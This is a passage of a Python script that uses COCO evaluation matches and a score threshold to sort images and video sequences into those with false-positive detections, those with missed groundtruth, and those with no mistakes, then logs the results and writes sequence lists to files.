        # remaining per-category entries are skipped, so missed groundtruth
        # in another category of the same image goes unrecorded. Behavior
        # preserved from the original — confirm intended.
        if image_id in images_with_unmatched_detections:
            continue
        # detection_to_groundtruth[d] holds the id of the groundtruth
        # matched to detection d, or 0 if there is no match.
        detection_to_groundtruth = eval_info['dtMatches'][iou_index].tolist()
        detection_scores = eval_info['dtScores']
        # False positives: confident detections with no groundtruth match.
        for detection_score, matched_groundtruth in zip(
                detection_scores, detection_to_groundtruth):
            if (detection_score > args.score_threshold
                    and matched_groundtruth == 0):
                images_with_unmatched_detections.add(image_id)
        detection_id_to_index = {
            detection_id: index
            for index, detection_id in enumerate(eval_info['dtIds'])
        }
        # groundtruth_to_detection[g] holds the id of the detection matched
        # to groundtruth g, or 0 if there is no match.
        groundtruth_to_detection = eval_info['gtMatches'][iou_index].tolist()
        # False negatives: groundtruth with no confident matched detection.
        for detection_match in groundtruth_to_detection:
            assert detection_match.is_integer()
            if detection_match != 0:
                detection_score = detection_scores[
                    detection_id_to_index[int(detection_match)]]
            if (detection_match == 0
                    or detection_score < args.score_threshold):
                images_with_missed_groundtruth.add(image_id)

    def sequences_of(image_ids):
        # A sequence name is the parent directory of the image's file_name.
        return set(
            Path(coco_eval.cocoGt.imgs[image_id]['file_name']).parent.name
            for image_id in image_ids)

    sequences_with_unmatched_detections = sequences_of(
        images_with_unmatched_detections)
    sequences_with_missed_groundtruth = sequences_of(
        images_with_missed_groundtruth)
    # BUG FIX: previously this subtracted the *sequence-name* sets from the
    # set of image ids, which removed essentially nothing; subtract the
    # per-image mistake sets instead.
    images_with_no_mistakes = (
        set(coco_eval.cocoGt.imgs.keys()) - images_with_unmatched_detections
        - images_with_missed_groundtruth)
    all_sequences = sequences_of(coco_eval.cocoGt.imgs.keys())
    sequences_with_no_mistakes = (
        all_sequences - sequences_with_missed_groundtruth -
        sequences_with_unmatched_detections)

    def report(label, filename, images, sequences):
        # Log image/sequence counts and write the sorted sequence list.
        sequences = sorted(sequences)
        logging.info('Num images with %s: %s', label, len(images))
        logging.info('Num sequences with %s: %s', label, len(sequences))
        logging.info('Sequences with %s: %s', label, ', '.join(sequences))
        with open(args.output_dir / filename, 'w') as f:
            f.write('\n'.join(sequences))

    report('unmatched detections', 'false-positive-sequences.txt',
           images_with_unmatched_detections,
           sequences_with_unmatched_detections)
    report('missed groundtruth', 'false-negative-sequences.txt',
           images_with_missed_groundtruth, sequences_with_missed_groundtruth)
    report('no mistakes', 'no-mistake-sequences.txt',
           images_with_no_mistakes, sequences_with_no_mistakes)
if __name__ == "__main__":
main() | 0.456894 | 0.227942 |